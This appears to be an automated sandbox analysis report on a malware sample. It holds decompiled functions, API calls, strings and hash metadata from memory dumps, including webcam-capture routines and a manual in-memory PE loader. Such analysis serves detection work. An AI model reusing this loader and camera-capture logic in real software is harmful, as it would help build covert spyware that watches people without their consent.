							} else {
								_t135 = _t134 - 1;
								__eflags = _t135;
								if(_t135 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t136 = _t135 - 1;
									__eflags = _t136;
									if(_t136 == 0) {
										_t57 =  *0x46bac4();
										 *0x46ba77 = _t57;
										__eflags = _t57;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t120 = E105C75D7(_t52, E10592E03(E10592CB7( &_v52, _t120, __eflags, 0)));
											E1059558C(_a4, _t54, __eflags);
										}
									} else {
										_t137 = _t136 - 1;
										__eflags = _t137;
										if(_t137 == 0) {
											_t59 =  *0x46bac4();
											 *0x46ba77 = _t59;
											__eflags = _t59;
											if(__eflags == 0) {
												L15:
												E10592F5A(_t78, _t146 - 0x18, _t120, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												E10595912(_t78, _a4, _t120, __eflags);
											} else {
												_t62 = E105C75D7(_t60, E10592E03(E10592CB7( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8;
												Sleep(??);
												_t120 = _t62;
												E1059558C(_a4, _t62, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						E10592CE2( &_v52, _t120);
						E10592E35();
						E10592E35();
						__eflags = 0;
						return 0;
					} else {
						_t65 = _t120 + _t78;
						_a12 = _t120 + _t78;
						__eflags = _t78;
						if(__eflags != 0) {
							_push(0);
							_t67 = E10593683(_t78, _t129, _t120, _t125, __eflags, _t65);
							__eflags = _t67;
							if(_t67 != 0) {
								_push( *_a8);
								_t69 = E10593097(_t129);
								E1059240D(E10593097(_t129) + _t78 * 2, _t69);
								_push(_t78);
								E105923F9(E10593097(_t129), _t125);
								E105936F6(_a12);
							}
						}
						_t66 = _t129;
						goto L7;
					}
				} else {
					_t66 = E1059442D(__ebx, _t129, __edx, _t125 - E10593097(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E10593097(_t81) >> 1, _a12);
					L7:
					return _t66;
				}
			}

0x105952f8
0x105952f9
0x105952fc
0x105952ff
0x10595304
0x10595306
0x10595308
0x10595322
0x10595325
0x1059532c
0x10595331
0x10595334
0x10595337
0x1059533d
0x1059533f
0x105953a0
0x105953a5
0x105953b2
0x105953b3
0x105953c6
0x105953cb
0x105953d5
0x105953da
0x105953e4
0x105953ed
0x105953f2
0x105953f5
0x105953f5
0x105953f8
0x105954d8
0x105954df
0x105954f3
0x105954f8
0x10595501
0x10595503
0x10595505
0x10595518
0x10595529
0x10595530
0x10595535
0x1059553a
0x10595549
0x10595550
0x1059555c
0x10595561
0x00000000
0x10595561
0x105953fe
0x105953fe
0x105953fe
0x10595401
0x1059549d
0x105954a4
0x00000000
0x00000000
0x10595407
0x10595407
0x10595407
0x1059540a
0x1059548b
0x10595491
0x1059540c
0x1059540c
0x1059540c
0x1059540f
0x1059547a
0x10595480
0x10595485
0x10595487
0x00000000
0x10595489
0x105954aa
0x105954c6
0x105954c8
0x105954c8
0x10595411
0x10595411
0x10595411
0x10595414
0x1059541a
0x10595420
0x10595425
0x10595427
0x10595464
0x1059546e
0x10595473
0x10595563
0x10595566
0x10595429
0x1059543b
0x10595442
0x10595449
0x10595452
0x10595454
0x10595459
0x10595459
0x10595427
0x10595414
0x1059540f
0x1059540a
0x10595401
0x1059556f
0x10595578
0x10595580
0x10595585
0x1059558b
0x10595341
0x10595341
0x10595344
0x10595347
0x10595349
0x1059534b
0x10595350
0x10595355
0x10595357
0x1059535e
0x10595360
0x10595371
0x1059537b
0x10595383
0x10595390
0x10595390
0x10595357
0x10595395
0x00000000
0x10595397
0x1059530a
0x1059531b
0x10595398
0x1059539b
0x1059539b

APIs

Part of subcall function 10593746: std::_Xinvalid_argument.LIBCPMT ref: 1059374B

Sleep.KERNEL32(00000000,?), ref: 10595449

Part of subcall function 1059558C: __EH_prolog.LIBCMT ref: 10595591

Strings

GetFrame, xrefs: 10595524
OpenCamera, xrefs: 10595507
CloseCamera, xrefs: 10595513
FreeFrame, xrefs: 10595535

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: 0f947f4514c31b9979c70bfd55ff0e94cfeb83e6e03146887a9589aee2dda04e
Instruction ID: 4c16aa22396e4aef4bde0532967c0545b640a4c836c3628ea3c1b80be6944406
Opcode Fuzzy Hash: 0f947f4514c31b9979c70bfd55ff0e94cfeb83e6e03146887a9589aee2dda04e
Instruction Fuzzy Hash: 7E510579A04200ABCB00AB74CC5EA6E3F5ADFC1694F004429F8059B791EF74AE19C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 00404486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD

Sleep.KERNEL32(00000000,?), ref: 004045DB

Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723

Strings

GetFrame, xrefs: 004046B6
OpenCamera, xrefs: 00404699
CloseCamera, xrefs: 004046A5
FreeFrame, xrefs: 004046C7

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: 337efe400a13bf0863073eb3597778a622aea2c053e20aeb55c4ca0a1acbd334
Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
Opcode Fuzzy Hash: 337efe400a13bf0863073eb3597778a622aea2c053e20aeb55c4ca0a1acbd334
Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E

Uniqueness

Uniqueness Score: -1.00%

Function 105A0515, Relevance: 7.7, APIs: 5, Instructions: 206
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E105A0515(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v52;
				char _v56;
				signed int _t59;
				signed int _t61;
				void* _t65;
				void* _t68;
				signed int _t73;
				void* _t79;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed int _t84;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t93;
				signed int _t94;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t114;
				void* _t116;
				signed int _t119;
				void* _t125;
				signed int _t127;
				intOrPtr _t129;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				void* _t134;

				_t116 = 0x40;
				_v16 = __edx;
				_v8 = __ecx;
				_t125 = 0;
				if(E1059FFB8(__edx, _t116) == 0) {
					L33:
					return 0;
				}
				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
					_t59 = E1059FFB8(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L33;
					}
					_t97 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					__eflags =  *_t97 - 0x4550;
					if( *_t97 != 0x4550) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t97 + 4)) - 0x14c;
					if( *((intOrPtr*)(_t97 + 4)) != 0x14c) {
						goto L2;
					}
					__eflags =  *(_t97 + 0x38) & 0x00000001;
					if(( *(_t97 + 0x38) & 0x00000001) != 0) {
						goto L2;
					}
					_t119 =  *(_t97 + 6) & 0x0000ffff;
					_t61 =  *(_t97 + 0x14) & 0x0000ffff;
					__eflags = _t119;
					if(_t119 == 0) {
						L14:
						 *0x4530d8( &_v56);
						_t129 = E1059FFA7( *((intOrPtr*)(_t97 + 0x50)), _v52);
						_v20 = _t129;
						_t65 = E1059FFA7(_t125, _v52);
						__eflags = _t129 - _t65;
						if(_t129 != _t65) {
							goto L2;
						}
						_push(0);
						_t130 = E105A04B1( *((intOrPtr*)(_t97 + 0x34)), _t129, 0x3000, 4);
						_t134 = _t133 + 0x14;
						_v12 = _t130;
						__eflags = _t130;
						if(_t130 != 0) {
							L18:
							_t68 = RtlAllocateHeap(GetProcessHeap(), 8, 0x40);
							_t127 = _t68;
							__eflags = _t127;
							if(_t127 != 0) {
								 *(_t127 + 4) = _t130;
								 *(_t127 + 0x34) =  *(_t127 + 0x34) & 0x00000000;
								 *((intOrPtr*)(_t127 + 0x1c)) = 0x40f643;
								 *(_t127 + 0x14) = ( *(_t97 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t127 + 0x20)) = 0x40f65a;
								 *((intOrPtr*)(_t127 + 0x24)) = 0x40f66e;
								 *((intOrPtr*)(_t127 + 0x28)) = 0x40f67c;
								 *((intOrPtr*)(_t127 + 0x2c)) = 0x40f68d;
								 *((intOrPtr*)(_t127 + 0x3c)) = _v52;
								_t73 = E1059FFB8(_v16,  *((intOrPtr*)(_t97 + 0x54)));
								__eflags = _t73;
								if(_t73 == 0) {
									L32:
									E105A08B5(_t127);
									goto L33;
								}
								_push(0);
								_t131 = E105A04B1(_t130,  *((intOrPtr*)(_t97 + 0x54)), 0x1000, 4);
								E105C334E(_t131, _v8,  *((intOrPtr*)(_t97 + 0x54)));
								_t43 = _v8 + 0x3c; // 0x4530cc
								_t79 =  *_t43 + _t131;
								_t132 = _v12;
								 *_t127 = _t79;
								 *((intOrPtr*)(_t79 + 0x34)) = _t132;
								_t80 = E1059FFCB(_v8, _v16, _t97, _t127);
								__eflags = _t80;
								if(_t80 == 0) {
									goto L32;
								}
								_t81 =  *_t127;
								_t124 =  *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34));
								__eflags =  *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34));
								if( *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34))) {
									_t99 = 1;
									__eflags = 1;
									 *((intOrPtr*)(_t127 + 0x18)) = 1;
								} else {
									 *((intOrPtr*)(_t127 + 0x18)) = E105A02C7(_t127, _t124);
									_t99 = 1;
								}
								__eflags = E105A036C(_t127);
								if(__eflags != 0) {
									_t83 = E105A0172(_t127, __eflags);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L32;
									}
									_t84 = E105A0296(_t127);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L32;
									}
									_t86 =  *( *_t127 + 0x28);
									__eflags = _t86;
									if(_t86 == 0) {
										_t54 = _t127 + 0x38;
										 *_t54 =  *(_t127 + 0x38) & 0x00000000;
										__eflags =  *_t54;
										L38:
										return _t127;
									}
									_t88 = _t86 + _t132;
									__eflags =  *(_t127 + 0x14);
									if( *(_t127 + 0x14) == 0) {
										 *(_t127 + 0x38) = _t88;
										goto L38;
									}
									_t89 =  *_t88(_t132, _t99, 0);
									__eflags = _t89;
									if(_t89 != 0) {
										 *((intOrPtr*)(_t127 + 0x10)) = _t99;
										goto L38;
									}
									SetLastError(0x45a);
								}
								goto L32;
							}
							_push(_t68);
							E105A04C8(_t130, _t68, 0x8000);
							L17:
							_push(0xe);
							L3:
							SetLastError();
							goto L33;
						}
						_push(0);
						_t92 = E105A04B1(0, _v20, 0x3000, 4);
						_t130 = _t92;
						_v12 = _t92;
						_t134 = _t134 + 0x14;
						__eflags = _t130;
						if(_t130 != 0) {
							goto L18;
						}
						goto L17;
					}
					_t114 = _t97 + 0x24 + _t61;
					__eflags = _t114;
					do {
						__eflags =  *(_t114 + 4);
						_t93 =  *_t114;
						if( *(_t114 + 4) != 0) {
							_t94 = _t93 +  *(_t114 + 4);
							__eflags = _t94;
						} else {
							_t94 = _t93 +  *(_t97 + 0x38);
						}
						__eflags = _t94 - _t125;
						_t125 =  >  ? _t94 : _t125;
						_t114 = _t114 + 0x28;
						_t119 = _t119 - 1;
						__eflags = _t119;
					} while (_t119 != 0);
					goto L14;
				}
				L2:
				_push(0xc1);
				goto L3;
			}

0x105a0524
0x105a0527
0x105a052a
0x105a052d
0x105a0536
0x105a0750
0x00000000
0x105a0750
0x105a0544
0x105a0561
0x105a0566
0x105a0568
0x00000000
0x00000000
0x105a0571
0x105a0573
0x105a0579
0x00000000
0x00000000
0x105a0580
0x105a0584
0x00000000
0x00000000
0x105a0586
0x105a058a
0x00000000
0x00000000
0x105a058c
0x105a0590
0x105a0594
0x105a0596
0x105a05ba
0x105a05be
0x105a05cf
0x105a05d3
0x105a05d6
0x105a05db
0x105a05dd
0x00000000
0x00000000
0x105a05e5
0x105a05f6
0x105a05f8
0x105a05fb
0x105a05fe
0x105a0600
0x105a0626
0x105a0631
0x105a0637
0x105a0639
0x105a063b
0x105a0652
0x105a0659
0x105a0663
0x105a066a
0x105a066d
0x105a0674
0x105a067b
0x105a0682
0x105a068c
0x105a0692
0x105a0697
0x105a0699
0x105a0749
0x105a074b
0x00000000
0x105a074b
0x105a069f
0x105a06b4
0x105a06ba
0x105a06c9
0x105a06cc
0x105a06ce
0x105a06d1
0x105a06d4
0x105a06d7
0x105a06df
0x105a06e1
0x00000000
0x00000000
0x105a06e3
0x105a06e8
0x105a06e8
0x105a06eb
0x105a06fe
0x105a06fe
0x105a06ff
0x105a06ed
0x105a06f6
0x105a06f9
0x105a06f9
0x105a0709
0x105a070b
0x105a070f
0x105a0714
0x105a0716
0x00000000
0x00000000
0x105a071a
0x105a071f
0x105a0721
0x00000000
0x00000000
0x105a0725
0x105a0728
0x105a072a
0x105a0763
0x105a0763
0x105a0763
0x105a0767
0x00000000
0x105a0767
0x105a072c
0x105a072e
0x105a0732
0x105a075e
0x00000000
0x105a075e
0x105a0738
0x105a073a
0x105a073c
0x105a0759
0x00000000
0x105a0759
0x105a0743
0x105a0743
0x00000000
0x105a070b
0x105a063d
0x105a0645
0x105a061f
0x105a061f
0x105a054b
0x105a054b
0x00000000
0x105a054b
0x105a0602
0x105a060e
0x105a0613
0x105a0615
0x105a0618
0x105a061b
0x105a061d
0x00000000
0x00000000
0x00000000
0x105a061d
0x105a059b
0x105a059b
0x105a059d
0x105a059d
0x105a05a1
0x105a05a3
0x105a05aa
0x105a05aa
0x105a05a5
0x105a05a5
0x105a05a5
0x105a05ad
0x105a05af
0x105a05b2
0x105a05b5
0x105a05b5
0x105a05b5
0x00000000
0x105a059d
0x105a0546
0x105a0546
0x00000000

APIs

Part of subcall function 1059FFB8: SetLastError.KERNEL32(0000000D,105A0534,0045F464,00000000,?), ref: 1059FFBE

SetLastError.KERNEL32(000000C1,0045F464,00000000,?), ref: 105A054B
GetNativeSystemInfo.KERNEL32(?,0045F464,00000000,?), ref: 105A05BE
GetProcessHeap.KERNEL32(00000008,00000040), ref: 105A062A
RtlAllocateHeap.NTDLL(00000000), ref: 105A0631
SetLastError.KERNEL32(0000045A), ref: 105A0743

Part of subcall function 105A04C8: VirtualFree.KERNEL32(00008000,00000000,00000000,?,105A064A,00000000,00000000,00008000,00000000), ref: 105A04D4

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocateFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 2470655666-0
Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction ID: f3b57434fa288600dee248f6c89eb7764ed500daf2e7ebfcd709cc337fb424f3
Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction Fuzzy Hash: 7B610D75A10201EBDB409F65CD85B6EBFA6FF88790F009069FA089B680DB74F951CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6A7, Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150

SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
SetLastError.KERNEL32(0000045A), ref: 0040F8D5

Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 486403682-0
Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043E550, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

_free.LIBCMT ref: 0043E65B
_free.LIBCMT ref: 0043E672
_free.LIBCMT ref: 0043E691
_free.LIBCMT ref: 0043E6AC
_free.LIBCMT ref: 0043E6C3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88

Uniqueness

Uniqueness Score: -1.00%

Function 105D3CD1, Relevance: 7.7, APIs: 5, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E105D3CD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;

				_t88 = __edi;
				_t96 = E105D373B();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E105D3799( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E105C77F8();
					asm("int3");
					_t106 = _t107;
					_v56 =  *0x46a00c ^ _t106;
					 *0x46a344 =  *0x46a344 | 0xffffffff;
					 *0x46a338 =  *0x46a338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t89 = 0;
					 *0x46b748 = 0;
					_t42 = E105CA703(__eflags,  &_v316,  &_v312, 0x100, 0x45913c);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E105D07FA(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E105CA703(__eflags,  &_v276, _t101, _v272, 0x45913c);
								__eflags = _t50;
								if(_t50 == 0) {
									E105D1063(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E105D1063();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E105D3CD1(0x45913c, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E105D3AFC(0x45913c, _t89, _t100, __eflags);
						}
					}
					E105D1063(_t100);
					__eflags = _v12 ^ _t106;
					return E105C0B89(_v12 ^ _t106);
				} else {
					_t54 = E105D3741( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E105D376D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E105D1063( *0x46b740);
							 *0x46b740 = 0;
							 *_t107 = 0x46b750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46b750 * 0x3c;
								_t87 =  *0x46b7a4;
								_push(__edi);
								 *0x46b748 = 1;
								_v8 = _t85;
								if( *0x46b796 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								if( *0x46b7ea == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46b7f8;
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E105D03C9(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E105D3735()) = _v8;
							 *(E105D3729()) = _v12;
							_t61 = E105D372F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x105d3cd1
0x105d3ce0
0x105d3ce7
0x105d3ceb
0x105d3cee
0x105d3cf1
0x105d3cf6
0x105d3cf9
0x105d3e21
0x105d3e21
0x105d3e22
0x105d3e23
0x105d3e24
0x105d3e25
0x105d3e26
0x105d3e2b
0x105d3e2f
0x105d3e3e
0x105d3e41
0x105d3e4e
0x105d3e55
0x105d3e56
0x105d3e5d
0x105d3e6c
0x105d3e73
0x105d3e7b
0x105d3e7d
0x105d3e87
0x105d3e8a
0x105d3e97
0x105d3e9a
0x105d3e9c
0x105d3eb5
0x105d3ebd
0x105d3ebf
0x105d3ec5
0x105d3eca
0x105d3ec1
0x105d3ec1
0x00000000
0x105d3ec1
0x105d3e9e
0x105d3e9e
0x105d3e9f
0x105d3e9f
0x105d3e9f
0x105d3ecc
0x105d3e7f
0x105d3e7f
0x105d3e7f
0x105d3ed9
0x105d3edb
0x105d3edd
0x105d3edf
0x105d3eef
0x105d3eef
0x105d3ee1
0x105d3ee1
0x105d3ee4
0x00000000
0x105d3ee6
0x105d3ee6
0x105d3ee7
0x105d3eec
0x105d3ee4
0x105d3ef5
0x105d3f00
0x105d3f0b
0x105d3cff
0x105d3d03
0x105d3d08
0x105d3d0b
0x00000000
0x105d3d11
0x105d3d15
0x105d3d1a
0x105d3d1d
0x00000000
0x105d3d23
0x105d3d29
0x105d3d2e
0x105d3d34
0x105d3d44
0x105d3d4a
0x105d3d51
0x105d3d57
0x105d3d5b
0x105d3d61
0x105d3d6b
0x105d3d72
0x105d3d72
0x105d3d7c
0x105d3d94
0x105d3d94
0x105d3d97
0x105d3d7e
0x105d3d7e
0x105d3d85
0x00000000
0x105d3d87
0x105d3d89
0x105d3d8f
0x105d3d8f
0x105d3d85
0x105d3d9f
0x105d3dbb
0x105d3dcb
0x105d3dc2
0x105d3dc4
0x105d3dc4
0x105d3de9
0x105d3dfb
0x105d3df0
0x105d3df3
0x105d3df3
0x105d3de9
0x105d3e05
0x105d3e0f
0x105d3e14
0x105d3e19
0x105d3e20
0x105d3e20
0x105d3d1d
0x105d3d0b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 105D3D3B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 105D3DB3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 105D3DE0
_free.LIBCMT ref: 105D3D29

Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B

_free.LIBCMT ref: 105D3EF5

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
Instruction ID: 73e4f9793159db4c8c6118ffdf4dcf41e349dd13d24066afabaebae3b3a1a762
Opcode Fuzzy Hash: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
Instruction Fuzzy Hash: 6851D6B5900349EBC700DF6DDC8599ABFBCEF80391B11866BE410D7391EB709E418B95

Uniqueness

Uniqueness Score: -1.00%

Function 105CE4DB, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E105CE4DB(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c;
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E105CE39C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E105BFF0A(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E105BFF0A(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E105BFF0A(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E105D8BC3(_t56);
						_t40 = E105D1063(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E105D8BC3(_t56);
						E105D1063(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x105ce4db
0x105ce4e5
0x105ce4e9
0x105ce4eb
0x105ce4ef
0x105ce4f9
0x105ce50a
0x105ce50f
0x105ce511
0x105ce513
0x105ce515
0x105ce517
0x105ce51b
0x105ce5d5
0x105ce5e3
0x105ce5e5
0x105ce5ea
0x105ce5f1
0x105ce601
0x105ce610
0x105ce613
0x105ce615
0x00000000
0x105ce616
0x105ce523
0x105ce528
0x105ce52d
0x105ce52f
0x105ce52f
0x105ce531
0x105ce536
0x105ce53a
0x105ce53a
0x105ce53d
0x105ce55c
0x105ce55c
0x105ce55e
0x105ce561
0x105ce56a
0x105ce56d
0x105ce572
0x105ce575
0x105ce57a
0x00000000
0x00000000
